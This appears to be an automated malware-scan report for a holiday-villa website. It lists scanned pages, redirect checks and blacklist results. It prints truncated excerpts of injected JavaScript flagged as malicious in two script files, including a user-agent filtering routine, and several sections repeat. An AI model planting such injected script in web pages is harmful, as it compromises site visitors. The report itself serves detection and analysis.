Scanned pages/files
Request | Server response | Status |
http://sunny-design.com/ | 200 OK Content-Length: 36880 Content-Type: text/html | clean |
http://sunny-design.com/javascripts/basic_lib.js | 200 OK Content-Length: 4726 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob } function show_cstes_web() { MM_openBrWindow('http://www.costadelsol-travel.com/es/','cstes','directories=no,location=yes,menubar=yes,resizable=yes,status=yes,toolbar=yes,scrollbars=yes,width=700,height=500'); } function show_csten_web() { MM_openBrWindow('http://www.costadelsol-travel.com/','csten','directories=no,location=yes,menubar=yes,resizable=yes,status=yes,toolbar=yes,scrollbars=yes,width=700,height=500'); } Antivirus reports:
| ||
http://sunny-design.com/javascripts/date.js | 200 OK Content-Length: 2839 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob months[5]="May"; months[6]="June"; months[7]="July"; months[8]="August"; months[9]="September"; months[10]="October"; months[11]="November"; months[12]="December"; var time=new Date(); var lmonth=months[time.getMonth() + 1]; var date=time.getDate(); var year=time.getYear(); var wkday=time.getDay()+1; if (year < 2000) year = year + 1900; document.write( date + " " + lmonth + " " + year + " ") Antivirus reports:
| ||
http://sunny-design.com/SDGateway.html | 200 OK Content-Length: 26012 Content-Type: text/html | clean |
http://sunny-design.com/PartnershipProgram.html | 200 OK Content-Length: 32980 Content-Type: text/html | clean |
http://sunny-design.com/PartnerForm.html | 200 OK Content-Length: 37586 Content-Type: text/html | clean |
http://sunny-design.com/InformationForm.html | 200 OK Content-Length: 30892 Content-Type: text/html | clean |
http://sunny-design.com/LettingForm.html | 200 OK Content-Length: 44181 Content-Type: text/html | clean |
http://sunny-design.com/LettingService.html | 200 OK Content-Length: 42836 Content-Type: text/html | clean |
http://sunny-design.com/PropertyManagement.html | 200 OK Content-Length: 31063 Content-Type: text/html | clean |
http://sunny-design.com/VillaHoliday.html | 200 OK Content-Length: 33308 Content-Type: text/html | clean |
http://sunny-design.com/index.html | 200 OK Content-Length: 36880 Content-Type: text/html | clean |
http://sunny-design.com/./index.html | 200 OK Content-Length: 36880 Content-Type: text/html | clean |
http://sunny-design.com/./javascripts/basic_lib.js | 200 OK Content-Length: 4726 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob } function show_cstes_web() { MM_openBrWindow('http://www.costadelsol-travel.com/es/','cstes','directories=no,location=yes,menubar=yes,resizable=yes,status=yes,toolbar=yes,scrollbars=yes,width=700,height=500'); } function show_csten_web() { MM_openBrWindow('http://www.costadelsol-travel.com/','csten','directories=no,location=yes,menubar=yes,resizable=yes,status=yes,toolbar=yes,scrollbars=yes,width=700,height=500'); } Antivirus reports:
| ||
http://sunny-design.com/./javascripts/date.js | 200 OK Content-Length: 2839 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob months[5]="May"; months[6]="June"; months[7]="July"; months[8]="August"; months[9]="September"; months[10]="October"; months[11]="November"; months[12]="December"; var time=new Date(); var lmonth=months[time.getMonth() + 1]; var date=time.getDate(); var year=time.getYear(); var wkday=time.getDay()+1; if (year < 2000) year = year + 1900; document.write( date + " " + lmonth + " " + year + " ") Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sunny-design.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=7200, private, must-revalidate
Connection: close
Date: Wed, 23 Jul 2014 19:32:20 GMT
Accept-Ranges: bytes
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 36880
Content-Type: text/html
Expires: Wed, 23 Jul 2014 19:32:21 GMT
...36880 bytes of data.
GET / HTTP/1.1
Host: sunny-design.com
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=7200, private, must-revalidate
Connection: close
Date: Wed, 23 Jul 2014 19:32:20 GMT
Accept-Ranges: bytes
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 36880
Content-Type: text/html
Expires: Wed, 23 Jul 2014 19:32:21 GMT
...36880 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sunny-design.com
Referer: http://www.google.com/search?q=sunny-design.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sunny-design.com
Referer: http://www.google.com/search?q=sunny-design.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sunny-design.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sunny-design.com/
Result: sunny-design.com is not infected or malware details are not published yet.
Result: sunny-design.com is not infected or malware details are not published yet.